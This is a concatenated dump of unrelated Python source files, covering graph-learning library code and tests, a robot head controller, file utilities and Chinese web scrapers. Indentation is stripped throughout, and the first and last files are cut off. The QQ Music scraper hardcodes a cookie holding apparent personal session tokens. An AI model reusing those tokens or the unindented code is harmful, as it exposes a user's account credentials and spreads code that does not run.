p2 = re.compile(r'^(Appendix [A-Z].)\s+(.*)$')
p3 = re.compile(r'\[Page (\d+)\]$')
found = 0
page = 1
out = ""
for line in buf.split("\n"):
m1 = p1.search(line)
m2 = p2.search(line)
m3 = p3.search(line)
if m1:
out += FormatTocLine(m1.group(1), m1.group(3), page)
elif m2:
out += FormatTocLine(m2.group(1), m2.group(2), page)
elif line.startswith("Authors"):
out += FormatTocLine(None, line, page)
elif m3:
page = int(m3.group(1)) + 1
return out
src = Readfile(sys.argv[1])
out = Nroff(src)
toc = CreateToc(out)
src = src.replace("INSERT_TOC_HERE", toc)
print Nroff(src)
``` |
{
"source": "130ndim/pytorch_cluster",
"score": 3
} |
#### File: pytorch_cluster/torch_cluster/nearest.py
```python
import torch
import scipy.cluster
if torch.cuda.is_available():
import torch_cluster.nearest_cuda
def nearest(x, y, batch_x=None, batch_y=None):
r"""Clusters points in :obj:`x` together which are nearest to a given query
point in :obj:`y`.
Args:
x (Tensor): Node feature matrix
:math:`\mathbf{X} \in \mathbb{R}^{N \times F}`.
y (Tensor): Node feature matrix
:math:`\mathbf{Y} \in \mathbb{R}^{M \times F}`.
batch_x (LongTensor, optional): Batch vector
:math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^N`, which assigns each
node to a specific example. (default: :obj:`None`)
batch_y (LongTensor, optional): Batch vector
:math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^M`, which assigns each
node to a specific example. (default: :obj:`None`)
.. testsetup::
import torch
from torch_cluster import nearest
.. testcode::
>>> x = torch.Tensor([[-1, -1], [-1, 1], [1, -1], [1, 1]])
>>> batch_x = torch.tensor([0, 0, 0, 0])
>>> y = torch.Tensor([[-1, 0], [1, 0]])
>>> batch_y = torch.tensor([0, 0])
>>> cluster = nearest(x, y, batch_x, batch_y)
"""
if batch_x is None:
batch_x = x.new_zeros(x.size(0), dtype=torch.long)
if batch_y is None:
batch_y = y.new_zeros(y.size(0), dtype=torch.long)
x = x.view(-1, 1) if x.dim() == 1 else x
y = y.view(-1, 1) if y.dim() == 1 else y
assert x.dim() == 2 and batch_x.dim() == 1
assert y.dim() == 2 and batch_y.dim() == 1
assert x.size(1) == y.size(1)
assert x.size(0) == batch_x.size(0)
assert y.size(0) == batch_y.size(0)
if x.is_cuda:
return torch_cluster.nearest_cuda.nearest(x, y, batch_x, batch_y)
# Rescale x and y.
min_xy = min(x.min().item(), y.min().item())
x, y = x - min_xy, y - min_xy
max_xy = max(x.max().item(), y.max().item())
x, y, = x / max_xy, y / max_xy
# Concat batch/features to ensure no cross-links between examples exist.
x = torch.cat([x, 2 * x.size(1) * batch_x.view(-1, 1).to(x.dtype)], dim=-1)
y = torch.cat([y, 2 * y.size(1) * batch_y.view(-1, 1).to(y.dtype)], dim=-1)
return torch.from_numpy(
scipy.cluster.vq.vq(x.detach().cpu(),
y.detach().cpu())[0]).to(torch.long)
``` |
{
"source": "130ndim/pytorch_geometric",
"score": 2
} |
#### File: test/data/test_sampler.py
```python
import sys
import random
import os.path as osp
import shutil
import torch
from torch.nn.functional import relu
from torch_geometric.utils import erdos_renyi_graph
from torch_geometric.data import Data, NeighborSampler
from torch_geometric.datasets import Planetoid
from torch_geometric.nn.conv import SAGEConv
import torch_geometric.transforms as T
def test_sampler():
num_nodes = 10
data = Data(edge_index=erdos_renyi_graph(num_nodes, 0.1))
data.num_nodes = num_nodes
loader = NeighborSampler(data, size=[4, 0.5], num_hops=2, batch_size=2,
shuffle=True)
for data_flow in loader():
assert data_flow.__repr__()[:8] == 'DataFlow'
assert data_flow.n_id.size() == (2, )
assert data_flow.batch_size == 2
assert len(data_flow) == 2
block = data_flow[0]
assert block.__repr__()[:5] == 'Block'
for block in data_flow:
pass
data_flow = data_flow.to(torch.long)
break
for data_flow in loader(torch.tensor([0, 1, 2, 3, 4])):
pass
loader = NeighborSampler(data, size=[4, 0.5], num_hops=2, batch_size=3,
drop_last=True, shuffle=False,
add_self_loops=True)
for data_flow in loader():
pass
for data_flow in loader(torch.tensor([0, 1, 2, 3, 4])):
pass
mask = torch.tensor([0, 1, 0, 1, 0, 1, 0, 1, 0, 1], dtype=torch.bool)
for data_flow in loader(mask):
pass
def test_cora():
class Net(torch.nn.Module):
def __init__(self, in_channels, out_channels):
super(Net, self).__init__()
self.conv1 = SAGEConv(in_channels, 16)
self.conv2 = SAGEConv(16, 16)
self.conv3 = SAGEConv(16, out_channels)
def forward_data_flow(self, x, edge_weight, data_flow):
block = data_flow[0]
weight = None if block.e_id is None else edge_weight[block.e_id]
x = relu(self.conv1(x, block.edge_index, weight, block.size))
block = data_flow[1]
weight = None if block.e_id is None else edge_weight[block.e_id]
x = relu(self.conv2(x, block.edge_index, weight, block.size))
block = data_flow[2]
weight = None if block.e_id is None else edge_weight[block.e_id]
x = self.conv3(x, block.edge_index, weight, block.size)
return x
def forward(self, x, edge_index, edge_weight):
x = relu(self.conv1(x, edge_index, edge_weight))
x = relu(self.conv2(x, edge_index, edge_weight))
return self.conv3(x, edge_index, edge_weight)
root = osp.join('/', 'tmp', str(random.randrange(sys.maxsize)))
dataset = Planetoid(root, 'Cora')
model = Net(dataset.num_features, dataset.num_classes)
data1 = dataset[0]
data1.edge_weight = None
data2 = T.AddSelfLoops()(dataset[0])
data2.edge_weight = torch.rand(data2.num_edges)
data3 = dataset[0]
loop = torch.stack([torch.arange(100, 200), torch.arange(100, 200)], dim=0)
data3.edge_index = torch.cat([data3.edge_index, loop], dim=1)
data3.edge_weight = None
for data in [data1, data2, data3]:
out_all = model(data.x, data.edge_index, data.edge_weight)
loader = NeighborSampler(data, size=1.0, num_hops=3, batch_size=64,
shuffle=False, drop_last=False,
bipartite=True, add_self_loops=True)
for data_flow in loader(data.train_mask):
out = model.forward_data_flow(data.x[data_flow[0].n_id],
data.edge_weight, data_flow)
assert torch.allclose(out_all[data_flow.n_id], out, atol=1e-06)
loader = NeighborSampler(data, size=1.0, num_hops=3, batch_size=64,
shuffle=False, drop_last=False,
bipartite=False)
for subdata in loader(data.train_mask):
weight = data.edge_weight
weight = None if weight is None else weight[subdata.e_id]
out = model(data.x[subdata.n_id], subdata.edge_index, weight)
out = out[subdata.sub_b_id]
assert torch.allclose(out_all[subdata.b_id], out, atol=1e-06)
shutil.rmtree(root)
```
#### File: nn/conv/message_passing.py
```python
import sys
import inspect
import torch
from torch_geometric.utils import scatter_
special_args = [
'edge_index', 'edge_index_i', 'edge_index_j', 'size', 'size_i', 'size_j'
]
__size_error_msg__ = ('All tensors which should get mapped to the same source '
'or target nodes must be of same size in dimension 0.')
is_python2 = sys.version_info[0] < 3
getargspec = inspect.getargspec if is_python2 else inspect.getfullargspec
class MessagePassing(torch.nn.Module):
r"""Base class for creating message passing layers
.. math::
\mathbf{x}_i^{\prime} = \gamma_{\mathbf{\Theta}} \left( \mathbf{x}_i,
\square_{j \in \mathcal{N}(i)} \, \phi_{\mathbf{\Theta}}
\left(\mathbf{x}_i, \mathbf{x}_j,\mathbf{e}_{i,j}\right) \right),
where :math:`\square` denotes a differentiable, permutation invariant
function, *e.g.*, sum, mean or max, and :math:`\gamma_{\mathbf{\Theta}}`
and :math:`\phi_{\mathbf{\Theta}}` denote differentiable functions such as
MLPs.
See `here <https://pytorch-geometric.readthedocs.io/en/latest/notes/
create_gnn.html>`__ for the accompanying tutorial.
Args:
aggr (string, optional): The aggregation scheme to use
(:obj:`"add"`, :obj:`"mean"` or :obj:`"max"`).
(default: :obj:`"add"`)
flow (string, optional): The flow direction of message passing
(:obj:`"source_to_target"` or :obj:`"target_to_source"`).
(default: :obj:`"source_to_target"`)
"""
def __init__(self, aggr='add', flow='source_to_target'):
super(MessagePassing, self).__init__()
self.aggr = aggr
assert self.aggr in ['add', 'mean', 'max']
self.flow = flow
assert self.flow in ['source_to_target', 'target_to_source']
self.__message_args__ = getargspec(self.message)[0][1:]
self.__special_args__ = [(i, arg)
for i, arg in enumerate(self.__message_args__)
if arg in special_args]
self.__message_args__ = [
arg for arg in self.__message_args__ if arg not in special_args
]
self.__update_args__ = getargspec(self.update)[0][2:]
def propagate(self, edge_index, size=None, dim=0, **kwargs):
r"""The initial call to start propagating messages.
Args:
edge_index (Tensor): The indices of a general (sparse) assignment
matrix with shape :obj:`[N, M]` (can be directed or
undirected).
size (list or tuple, optional): The size :obj:`[N, M]` of the
assignment matrix. If set to :obj:`None`, the size is tried to
get automatically inferred and assumed to be symmetric.
(default: :obj:`None`)
dim (int, optional): The axis along which to aggregate.
(default: :obj:`0`)
**kwargs: Any additional data which is needed to construct messages
and to update node embeddings.
"""
dim = 0
size = [None, None] if size is None else list(size)
assert len(size) == 2
i, j = (0, 1) if self.flow == 'target_to_source' else (1, 0)
ij = {"_i": i, "_j": j}
message_args = []
for arg in self.__message_args__:
if arg[-2:] in ij.keys():
tmp = kwargs.get(arg[:-2], None)
if tmp is None: # pragma: no cover
message_args.append(tmp)
else:
idx = ij[arg[-2:]]
if isinstance(tmp, tuple) or isinstance(tmp, list):
assert len(tmp) == 2
if tmp[1 - idx] is not None:
if size[1 - idx] is None:
size[1 - idx] = tmp[1 - idx].size(dim)
if size[1 - idx] != tmp[1 - idx].size(dim):
raise ValueError(__size_error_msg__)
tmp = tmp[idx]
if tmp is None:
message_args.append(tmp)
else:
if size[idx] is None:
size[idx] = tmp.size(dim)
if size[idx] != tmp.size(dim):
raise ValueError(__size_error_msg__)
tmp = torch.index_select(tmp, dim, edge_index[idx])
message_args.append(tmp)
else:
message_args.append(kwargs.get(arg, None))
size[0] = size[1] if size[0] is None else size[0]
size[1] = size[0] if size[1] is None else size[1]
kwargs['edge_index'] = edge_index
kwargs['size'] = size
for (idx, arg) in self.__special_args__:
if arg[-2:] in ij.keys():
message_args.insert(idx, kwargs[arg[:-2]][ij[arg[-2:]]])
else:
message_args.insert(idx, kwargs[arg])
update_args = [kwargs[arg] for arg in self.__update_args__]
out = self.message(*message_args)
out = scatter_(self.aggr, out, edge_index[i], dim, dim_size=size[i])
out = self.update(out, *update_args)
return out
def message(self, x_j): # pragma: no cover
r"""Constructs messages to node :math:`i` in analogy to
:math:`\phi_{\mathbf{\Theta}}` for each edge in
:math:`(j,i) \in \mathcal{E}` if :obj:`flow="source_to_target"` and
:math:`(i,j) \in \mathcal{E}` if :obj:`flow="target_to_source"`.
Can take any argument which was initially passed to :meth:`propagate`.
In addition, tensors passed to :meth:`propagate` can be mapped to the
respective nodes :math:`i` and :math:`j` by appending :obj:`_i` or
:obj:`_j` to the variable name, *.e.g.* :obj:`x_i` and :obj:`x_j`.
"""
return x_j
def update(self, aggr_out): # pragma: no cover
r"""Updates node embeddings in analogy to
:math:`\gamma_{\mathbf{\Theta}}` for each node
:math:`i \in \mathcal{V}`.
Takes in the output of aggregation as first argument and any argument
which was initially passed to :meth:`propagate`."""
return aggr_out
```
#### File: torch_geometric/nn/meta.py
```python
import torch
class MetaLayer(torch.nn.Module):
r"""A meta layer for building any kind of graph network, inspired by the
`"Relational Inductive Biases, Deep Learning, and Graph Networks"
<https://arxiv.org/abs/1806.01261>`_ paper.
A graph network takes a graph as input and returns an updated graph as
output (with same connectivity).
The input graph has node features :obj:`x`, edge features :obj:`edge_attr`
as well as global-level features :obj:`u`.
The output graph has the same structure, but updated features.
Edge features, node features as well as global features are updated by
calling the modules :obj:`edge_model`, :obj:`node_model` and
:obj:`global_model`, respectively.
To allow for batch-wise graph processing, all callable functions take an
additional argument :obj:`batch`, which determines the assignment of
edges or nodes to their specific graphs.
Args:
edge_model (Module, optional): A callable which updates a graph's edge
features based on its source and target node features, its current
edge features and its global features. (default: :obj:`None`)
node_model (Module, optional): A callable which updates a graph's node
features based on its current node features, its graph
connectivity, its edge features and its global features.
(default: :obj:`None`)
global_model (Module, optional): A callable which updates a graph's
global features based on its node features, its graph connectivity,
its edge features and its current global features.
.. code-block:: python
from torch.nn import Sequential as Seq, Linear as Lin, ReLU
from torch_scatter import scatter_mean
from torch_geometric.nn import MetaLayer
class EdgeModel(torch.nn.Module):
def __init__(self):
super(EdgeModel, self).__init__()
self.edge_mlp = Seq(Lin(..., ...), ReLU(), Lin(..., ...))
def forward(self, src, dest, edge_attr, u, batch):
# source, target: [E, F_x], where E is the number of edges.
# edge_attr: [E, F_e]
# u: [B, F_u], where B is the number of graphs.
# batch: [E] with max entry B - 1.
out = torch.cat([src, dest, edge_attr, u[batch]], 1)
return self.edge_mlp(out)
class NodeModel(torch.nn.Module):
def __init__(self):
super(NodeModel, self).__init__()
self.node_mlp_1 = Seq(Lin(..., ...), ReLU(), Lin(..., ...))
self.node_mlp_2 = Seq(Lin(..., ...), ReLU(), Lin(..., ...))
def forward(self, x, edge_index, edge_attr, u, batch):
# x: [N, F_x], where N is the number of nodes.
# edge_index: [2, E] with max entry N - 1.
# edge_attr: [E, F_e]
# u: [B, F_u]
# batch: [N] with max entry B - 1.
row, col = edge_index
out = torch.cat([x[row], edge_attr], dim=1)
out = self.node_mlp_1(out)
out = scatter_mean(out, col, dim=0, dim_size=x.size(0))
out = torch.cat([x, out, u[batch]], dim=1)
return self.node_mlp_2(out)
class GlobalModel(torch.nn.Module):
def __init__(self):
super(GlobalModel, self).__init__()
self.global_mlp = Seq(Lin(..., ...), ReLU(), Lin(..., ...))
def forward(self, x, edge_index, edge_attr, u, batch):
# x: [N, F_x], where N is the number of nodes.
# edge_index: [2, E] with max entry N - 1.
# edge_attr: [E, F_e]
# u: [B, F_u]
# batch: [N] with max entry B - 1.
out = torch.cat([u, scatter_mean(x, batch, dim=0)], dim=1)
return self.global_mlp(out)
op = MetaLayer(EdgeModel(), NodeModel(), GlobalModel())
x, edge_attr, u = op(x, edge_index, edge_attr, u, batch)
"""
def __init__(self, edge_model=None, node_model=None, global_model=None):
super(MetaLayer, self).__init__()
self.edge_model = edge_model
self.node_model = node_model
self.global_model = global_model
self.reset_parameters()
def reset_parameters(self):
for item in [self.node_model, self.edge_model, self.global_model]:
if hasattr(item, 'reset_parameters'):
item.reset_parameters()
def forward(self, x, edge_index, edge_attr=None, u=None, batch=None):
""""""
row, col = edge_index
if self.edge_model is not None:
edge_attr = self.edge_model(x[row], x[col], edge_attr, u,
batch if batch is None else batch[row])
if self.node_model is not None:
x = self.node_model(x, edge_index, edge_attr, u, batch)
if self.global_model is not None:
u = self.global_model(x, edge_index, edge_attr, u, batch)
return x, edge_attr, u
def __repr__(self):
return ('{}(\n'
' edge_model={},\n'
' node_model={},\n'
' global_model={}\n'
')').format(self.__class__.__name__, self.edge_model,
self.node_model, self.global_model)
```
#### File: torch_geometric/utils/subgraph.py
```python
import torch
from .num_nodes import maybe_num_nodes
def subgraph(subset, edge_index, edge_attr=None, relabel_nodes=False,
num_nodes=None):
r"""Returns the induced subgraph of :obj:`(edge_index, edge_attr)`
containing the nodes in :obj:`subset`.
Args:
subset (LongTensor, BoolTensor or [int]): The nodes to keep.
edge_index (LongTensor): The edge indices.
edge_attr (Tensor, optional): Edge weights or multi-dimensional
edge features. (default: :obj:`None`)
relabel_nodes (bool, optional): If set to :obj:`True`, the resulting
:obj:`edge_index` will be relabeled to hold consecutive indices
starting from zero. (default: :obj:`False`)
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
:rtype: (:class:`LongTensor`, :class:`Tensor`)
"""
if isinstance(subset, list) or isinstance(subset, tuple):
subset = torch.tensor(subset, dtype=torch.long)
if subset.dtype == torch.bool or subset.dtype == torch.uint8:
n_mask = subset
if relabel_nodes:
n_idx = torch.zeros(n_mask.size(0), dtype=torch.long)
n_idx[subset] = torch.arange(subset.sum().item())
else:
num_nodes = maybe_num_nodes(edge_index, num_nodes)
n_mask = torch.zeros(num_nodes, dtype=torch.bool)
n_mask[subset] = 1
if relabel_nodes:
n_idx = torch.zeros(num_nodes, dtype=torch.long)
n_idx[subset] = torch.arange(subset.size(0))
mask = n_mask[edge_index[0]] & n_mask[edge_index[1]]
edge_index = edge_index[:, mask]
edge_attr = edge_attr[mask] if edge_attr is not None else None
if relabel_nodes:
edge_index = n_idx[edge_index]
return edge_index, edge_attr
``` |
{
"source": "130s/10sqft_hut",
"score": 3
} |
#### File: src/hut_10sqft/util.py
```python
import datetime
import fileinput
import fnmatch
import glob
import os
import re
import subprocess
import sys
import time
class Util:
@staticmethod
def find_all_files(path='.', filename_pattern='*', ret_relativepath=False,
depth_max=3):
'''
http://stackoverflow.com/questions/1724693/find-a-file-in-python
@param path: (str) Top level path to search.
@param filename_pattern: Full file name or pattern to be found.
@type filename_pattern: str
@param ret_relativepath: If True, returned file paths will be in
relative to the "path" arg.
e.g. ['file1', 'currentdir/file2']
@param depth_max: If 0 traverse until the program ends
(not tested well so NOT recommended).
@type depth_max: int
@return: List of absolute path of the files.
'''
filepaths_matched = []
_filenames = []
if depth_max == 0:
print('when depth_max=0: Search path: {},'
' abspath: {}'.format(path, os.path.abspath(path)))
for root, dirnames, filenames in os.walk(path):
# When one or more file exists in a dir.
if len(filenames):
for filename in filenames:
_filenames.append(os.path.join(root, filename))
else:
for depth in range(depth_max):
# Remove the last '/' to match files, not dir.
regex_depths = ('*/' * depth)[:-1]
_filenames.extend(glob.glob(regex_depths))
print('At depth {} regex_depths: {}\n\t_filenames at the'
' moment: {}'.format(depth, regex_depths, _filenames))
# print('DEBUG) filename_pattern: {}'.format(filename_pattern))
print('Depth_max: {} num of found files: {}'.format(
depth_max, len(_filenames)))
for filename in fnmatch.filter(_filenames, filename_pattern):
if os.path.isdir(filename):
continue
if ret_relativepath:
filepaths_matched.append(filename)
else:
filepaths_matched.append(os.path.abspath(filename))
if 0 < depth_max:
# This could print infinitely many files so better limit.
print('[find_all_files]: matched files: {}'.format(filepaths_matched))
return filepaths_matched
@staticmethod
def replaceAll(file, searchExp, replaceExp):
'''
http://stackoverflow.com/questions/39086/search-and-replace-a-line-in-a-file-in-python
Example usage:
replaceAll("/fooBar.txt","Hello\sWorld!$","Goodbye\sWorld.")
'''
for line in fileinput.input(file, inplace=1):
if searchExp in line:
line = line.replace(searchExp, replaceExp)
sys.stdout.write(line)
@staticmethod
def replace(filename, pattern, subst):
'''
Replace string in a single file.
RegEx capable.
Originally taken from http://stackoverflow.com/a/13641746/577001
@param pattern: Regular expression of the pattern of strings to be
replaced.
@param subst: Exact string to be replaced with.
@raise IOError: When the entity of filename not available.
'''
# Read contents from filename as a single string
try:
with open(filename, 'r') as file_handle:
file_string = file_handle.read()
file_handle.close()
except IOError as e:
print("Could not read file '{}'".format(filename))
raise e
# Use RE package to allow for replacement (also allowing for (multiline) REGEX)
file_string = (re.sub(pattern, subst, file_string))
# Write contents to file.
# Using mode 'w' truncates the file.
file_handle = open(filename, 'w')
file_handle.write(file_string)
file_handle.close()
@staticmethod
def replace_str_in_file(match_str_regex,
new_str,
target_path='.',
target_filename='*',
explore_depth_max=3):
'''
@param match_str_regex: File pattern to match. You can use regular
expression.
@param new_str: String to be used.
@param target_path: Path under which target file(s) will be searched
at. Full or relative path.
@param target_filename: Name of the file(s) to be manipulated.
@param explore_depth_max: Depth to explore. 0 for infinity.
'''
# Find all files in sub-folders.
files_found = Util.find_all_files(
target_path, target_filename, depth_max=explore_depth_max)
for f in files_found:
print('Path of the file to be replaced: {}'.format(f))
# replace(f, "<version>.*</version>", "<version>0.8.2</version>")
try:
Util.replace(f, match_str_regex, new_str)
except IOError as e:
print(e)
# Testing regex
# if re.match("<version>.*</version>", "<version>0.7.2</version>"):
# print(11)
# else:
# print(22)
@staticmethod
def common_list(list_a, list_b):
'''
Originally hinted at http://stackoverflow.com/questions/20050913/python-unittests-assertdictcontainssubset-recommended-alternative
@type list_a: [str]
@type list_b: [str]
Returns a list of common values among the two passed lists.
'''
return [k for k in list_a.keys() if k in list_b.keys()]
@staticmethod
def mv_ext(source, dest):
'''
Extension to Linux mv command.
@type source: str
@type dest: str
@return: destination path
'''
dest_name = dest + "_" + datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d%H%M%S')
print("mv dest name: {}".format(dest_name))
res = subprocess.call(["mv", source, dest_name])
if res != 0:
raise subprocess.CalledProcessError("source: {}, dest: {}".format(source, dest))
return dest_name
``` |
{
"source": "130s/baxter_interface",
"score": 2
} |
#### File: src/baxter_interface/head.py
```python
from copy import deepcopy
from math import fabs
import rospy
from std_msgs.msg import (
Bool
)
import baxter_dataflow
from baxter_core_msgs.msg import (
HeadPanCommand,
HeadState,
)
from baxter_interface import settings
class Head(object):
"""
Interface class for the head on the Baxter Robot.
Used to control the head pan angle and to enable/disable the head nod
action.
"""
def __init__(self):
"""
Constructor.
"""
self._state = dict()
self._pub_pan = rospy.Publisher(
'/robot/head/command_head_pan',
HeadPanCommand,
queue_size=10)
self._pub_nod = rospy.Publisher(
'/robot/head/command_head_nod',
Bool,
queue_size=10)
state_topic = '/robot/head/head_state'
self._sub_state = rospy.Subscriber(
state_topic,
HeadState,
self._on_head_state)
baxter_dataflow.wait_for(
lambda: len(self._state) != 0,
timeout=5.0,
timeout_msg=("Failed to get current head state from %s" %
(state_topic,)),
)
def _on_head_state(self, msg):
self._state['pan'] = msg.pan
self._state['panning'] = msg.isTurning
self._state['nodding'] = msg.isNodding
def pan(self):
"""
Get the current pan angle of the head.
@rtype: float
@return: current angle in radians
"""
return self._state['pan']
def nodding(self):
"""
Check if the head is currently nodding.
@rtype: bool
@return: True if the head is currently nodding, False otherwise.
"""
return self._state['nodding']
def panning(self):
"""
Check if the head is currently panning.
@rtype: bool
@return: True if the head is currently panning, False otherwise.
"""
return self._state['panning']
def set_pan(self, angle, speed=1.0, timeout=10.0, scale_speed=False):
"""
Pan at the given speed to the desired angle.
@type angle: float
@param angle: Desired pan angle in radians.
@type speed: int
@param speed: Desired speed to pan at, range is 0-1.0 [1.0]
@type timeout: float
@param timeout: Seconds to wait for the head to pan to the
specified angle. If 0, just command once and
return. [10]
@param scale_speed: Scale speed to pan at by a factor of 100,
to use legacy range between 0-100 [100]
"""
if scale_speed:
cmd_speed = speed / 100.0;
else:
cmd_speed = speed
if (cmd_speed < HeadPanCommand.MIN_SPEED_RATIO or
cmd_speed > HeadPanCommand.MAX_SPEED_RATIO):
rospy.logerr(("Commanded Speed, ({0}), outside of valid range"
" [{1}, {2}]").format(cmd_speed,
HeadPanCommand.MIN_SPEED_RATIO,
HeadPanCommand.MAX_SPEED_RATIO))
msg = HeadPanCommand(angle, cmd_speed, True)
self._pub_pan.publish(msg)
if not timeout == 0:
baxter_dataflow.wait_for(
lambda: (abs(self.pan() - angle) <=
settings.HEAD_PAN_ANGLE_TOLERANCE),
timeout=timeout,
rate=100,
timeout_msg="Failed to move head to pan command %f" % angle,
body=lambda: self._pub_pan.publish(msg)
)
def command_nod(self, timeout=5.0):
"""
Command the head to nod once.
@type timeout: float
@param timeout: Seconds to wait for the head to nod.
If 0, just command once and return. [0]
"""
self._pub_nod.publish(True)
if not timeout == 0:
# Wait for nod to initiate
baxter_dataflow.wait_for(
test=self.nodding,
timeout=timeout,
rate=100,
timeout_msg="Failed to initiate head nod command",
body=lambda: self._pub_nod.publish(True)
)
# Wait for nod to complete
baxter_dataflow.wait_for(
test=lambda: not self.nodding(),
timeout=timeout,
rate=100,
timeout_msg="Failed to complete head nod command",
body=lambda: self._pub_nod.publish(False)
)
``` |
{
"source": "1312246931/CIAIC_2020_TC",
"score": 3
} |
#### File: 2020.08.08/表情包提取/doutula_simple.py
```python
import requests
from bs4 import BeautifulSoup
import xlwt
import os
import re
import logging
def init_logger(log_file=None):
#日志配置
'''
:param log_file: 日志文件保存的地址
:return: 初始化的日志
'''
log_format = logging.Formatter("[%(asctime)s %(levelname)s] %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
console_handler = logging.StreamHandler()
console_handler.setFormatter(log_format)
logger.handlers = [console_handler]
if log_file and log_file != '':
file_handler = logging.FileHandler(log_file)
file_handler.setFormatter(log_format)
logger.addHandler(file_handler)
return logger
def request_doutula(url):
#验证网站是否能正常响应
'''
:param url: 网页链接
:return: None
'''
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
#向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识
try:
response = requests.get(url,headers=headers)
if response.status_code == 200:
return response.text
#如果网站能正常响应,则返回200,否则返回None
except requests.RequestException:
return None
def save_to_excel_and_download(sheet, soup, headers):
#从网页编码中提取需要的信息保存在excel表格中
'''
:param sheet: 工作表
:param soup: BeautifulSoup获得的网页信息
:param headers: 浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识
:return: None
'''
list = soup.find(class_='col-sm-9 center-wrap').find_all(class_='list-group-item random_list tg-article')
for item in list:
list_1 = item.find(class_='random_article').find_all(class_='col-xs-6 col-sm-3')
for item_1 in list_1:
item_name = item.find(class_='random_title').text
item_name = re.sub("[0-9-]", "", item_name)
item_time = item.find(class_='random_title').find(class_='date').string
item_img = item_1.find('img').get('data-original')
if item_img is None:
logger.error('None')
#如果不存在item_img,则输出None
else:
logger.info('爬取表情包:' + item_name + '|'+ item_img)
global n
sheet.write(n, 0, item_name)
sheet.write(n, 1, item_time)
sheet.write(n, 2, item_img)
download_pic(item_img, headers, item_name)
n=n+1
def download_pic(item_img, headers, item_name):
#下载从网页链接提取到的图片
'''
:param item_img: 提取到的表情包链接
:param headers: 浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识
:param item_name: 表情包的类别名
:return: None
'''
response = requests.get(item_img, headers=headers)
data = response.content
os.getcwd()
os.makedirs(str(item_name), exist_ok=True)
#生成一个目录
file_path = "/" + str(item_name) + '/' + str(n) + ".png"
with open(os.getcwd() + file_path, "wb") as f:
f.write(data)
logger.info("爬取图片+1")
logger = init_logger(log_file=os.path.join('C:/Users/LSP/Desktop/python学习笔记/表情包提取','extract_meme.log'))
def main(page, sheet, book):
#主函数
'''
:param page: 网站页码数
:param sheet: 工作表
:param book: excel表格
:return: None
'''
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
url = 'http://www.doutula.com/article/list/?page='+str(page)
##################################
html = request_doutula(url)
soup = BeautifulSoup(html, 'lxml')
#BeautifulSoup提取网页信息
save_to_excel_and_download(sheet, soup, headers)
book.save(u'表情包列表.xls')
def book_initialization():
#要得到的excel表格中统计的图片信息,都是可以从网页编码提取到的信息比如表情包类别名、表情包发布时间、具体图片的网页链接
'''
:return: 工作表,excel表格
'''
book = xlwt.Workbook(encoding='utf-8', style_compression=0)
sheet = book.add_sheet('斗图啦套图', cell_overwrite_ok=True)
sheet.write(0, 0, '名称')
sheet.write(0, 1, '时间')
sheet.write(0, 2, '图片')
return sheet, book
if __name__ == '__main__':
n = 1
sheet, book = book_initialization()
for i in range(1, 2):
#需要爬的页码数
main(i, sheet, book)
```
#### File: 李盛强/spider-weread/utils.py
```python
import logging
def init_logger(log_file=None):
"""
初始化一个logger
Ranking of level:CRITICAL(50) == FATAL(50) > ERROR(40) > WARNING(30) == WARN(30) > INFO(20) > DEBUG(10) > NOTSET(0)
:param log_file: 日志文件的路径
:return: logger
"""
log_format = logging.Formatter("[%(asctime)s %(levelname)s] %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO) #输出级别为INFO级别
console_handler = logging.StreamHandler()
console_handler.setFormatter(log_format)
logger.handlers = [console_handler]
if log_file and log_file != '':
file_handler = logging.FileHandler(log_file)
file_handler.setFormatter(log_format)
logger.addHandler(file_handler)
return logger
```
#### File: django_project/app003/views.py
```python
from django.shortcuts import render
from .douban_movie import Douban_Inquire, init_logger
# Create your views here.
def fun_method01(request):
return render(request,'app003/html04.html')
logger=init_logger(log_file='./日志.log')
def douban(request):
web_douban = Douban_Inquire()
infor = web_douban.get_web_douban()
return render(request, 'app003/html04.html',{'douban_movie_info': infor})
``` |
{
"source": "131250208/Doraemon",
"score": 2
} |
#### File: Doraemon/Crawlers/qq_music_crawler_by_album.py
```python
import html
import json
import re
import os
from urllib import parse
from Doraemon.Requests import requests_dora
from tqdm import tqdm
def get_album_list(sin, ein):
url = "https://c.y.qq.com/splcloud/fcgi-bin/fcg_get_diss_by_tag.fcg"
header = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"cookie": "RK=7dNm4/X + Yj; tvfe_boss_uuid=bf00ee54e9081ab4; pgv_pvi=8772238336; pac_uid=1_857193777; pgv_pvid=6457341280; o_cookie=80; ptcz=c761e59c8c8d6bd5198866d02a5cb7313af1af468006c455d6c2b5d26201d42e; pgv_si=s10759168; _qpsvr_localtk=0.08285763449905015; ptisp=ctc; luin=o0857193777; lskey=<KEY>; pt2gguin=o0857193777; uin=o0857193777; skey=@Kydi7w0EI; p_uin=o0857193777; p_skey=HjsE9sEjznJfXk*<KEY>_; pt4_token=c-p6sv3JEboA51cSQ3ABqxM8O80Jct3jYYkgy-aEQuE_; p_luin=o0857193777; p_lskey=000400008f9c296cd10c03a5173d22a184aad124d791568e90e4198beb8ad699a4d02fbfc059f71ab3d8758c; ts_last=y.qq.com/portal/playlist.html; ts_refer=ui.ptlogin2.qq.com/cgi-bin/login; ts_uid=3392060960",
"referer": "https://y.qq.com/portal/playlist.html"
}
paramter = {
"g_tk": "1089387893",
"jsonpCallback": "getPlaylist",
"loginUin": "0",
"hostUin": "0",
"format": "jsonp",
"inCharset": "utf8",
"outCharset": "utf-8",
"notice": "0",
"platform": "yqq",
"needNewCode": "0",
"categoryId": "10000000",
"sortId": "5",
"sin": sin, # 开始结点
"ein": ein # 结束结点,用于翻页
}
